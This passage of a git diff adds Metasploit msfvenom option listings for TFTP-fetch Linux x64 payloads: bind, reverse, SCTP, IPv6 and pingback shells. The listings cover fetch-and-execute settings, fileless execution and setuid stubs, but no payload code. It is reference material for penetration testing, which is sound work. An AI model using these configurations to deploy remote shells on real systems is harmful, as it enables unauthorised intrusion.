no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_bind_tcp.txt new file mode 100644 index 0000000..4042649 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_bind_tcp.txt @@ -0,0 +1,72 @@ + + Name: TFTP Fetch, Linux x64 Pingback, Bind TCP Inline + Module: payload/cmd/linux/tftp/x64/pingback_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NzcFiQrXd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Accept a connection from attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_reverse_tcp.txt new file mode 100644 index 0000000..91f8afb --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-pingback_reverse_tcp.txt @@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux x64 Pingback, Reverse TCP Inline + Module: payload/cmd/linux/tftp/x64/pingback_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME avMWkQDXJM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Connect back to attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-bind_tcp.txt new file mode 100644 index 0000000..5bed8a2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-bind_tcp.txt @@ -0,0 +1,86 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/tftp/x64/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PutzMjXOP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_sctp.txt new file mode 100644 index 0000000..baf62b2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_sctp.txt @@ -0,0 +1,94 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse SCTP Stager + Module: payload/cmd/linux/tftp/x64/shell/reverse_sctp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME hZmYsAoHn no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_tcp.txt new file mode 100644 index 0000000..77d1455 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell-reverse_tcp.txt @@ -0,0 +1,94 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YyItPlDQG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..6ea50bd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_ipv6_tcp.txt @@ -0,0 +1,74 @@ + + Name: TFTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/tftp/x64/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME tJhjbUTheRwd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Listen for an IPv6 connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp.txt new file mode 100644 index 0000000..c702a31 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp.txt @@ -0,0 +1,74 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/x64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZTfDUDATUGf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..5d80a27 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-shell_bind_tcp_random_port.txt @@ -0,0 +1,70 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/tftp/x64/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uXsLAkBGp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git 